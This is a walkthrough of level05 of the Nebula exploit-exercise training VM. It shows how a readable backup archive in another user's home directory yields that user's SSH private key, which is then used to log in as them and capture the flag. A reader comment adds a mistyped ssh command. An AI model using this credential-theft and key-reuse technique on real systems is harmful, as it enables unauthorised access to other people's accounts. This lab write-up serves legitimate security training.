Nebula exploit exercises walkthrough – level05

Posted on by

Check the flag05 home directory. You are looking for weak directory permissions

Let’s start looking in /home/flag05:

level05@nebula:/home/flag05$ ls -asl
total 9
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 .
0 drwxr-xr-x 1 root   root     420 2012-08-27 07:18 ..
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
4 -rw------- 1 flag05 flag05    13 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 flag05 flag05    60 2014-06-03 04:17 .cache
1 -rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
0 drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

Compare to the home directory of level05:

level05@nebula:/home/flag05$ ls -asl /home/level05
total 9
0 drwxr-x--- 1 level05 level05  100 2014-06-04 21:55 .
0 drwxr-xr-x 1 root    root     420 2012-08-27 07:18 ..
4 -rw------- 1 level05 level05  298 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 level05 level05  220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level05 level05   60 2014-06-03 04:15 .cache
1 -rw-r--r-- 1 level05 level05  675 2011-05-18 02:54 .profile

So we have .ssh – the store of SSH keys for the user – and .backup. The .ssh directory is locked down so we can’t see it.

Let’s look in .backup:

level05@nebula:/home/flag05/.backup$ ls -asl
total 2
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 ..
2 -rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

A single backup .tgz. Let’s copy it out to our own home directory and unpack.

level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz ./
level05@nebula:~$ tar zxvf backup-19072011.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

That’s the private (id_rsa) and public (id_rsa.pub) keys for flag05. They may well work on the local machine:

level05@nebula:~$ ssh flag05@localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

Simple. That’s why you should keep your private key private!

One thought on “Nebula exploit exercises walkthrough – level05

  1. Permalink  ⋅ Reply

    marlon

    September 13, 2018 at 5:07pm

    I had to use some other switches for this
    ssh -I id_rsa flag05@hocalhost

Leave a Reply

Your email will not be published. Name and Email fields are required.

This site uses Akismet to reduce spam. Learn how your comment data is processed.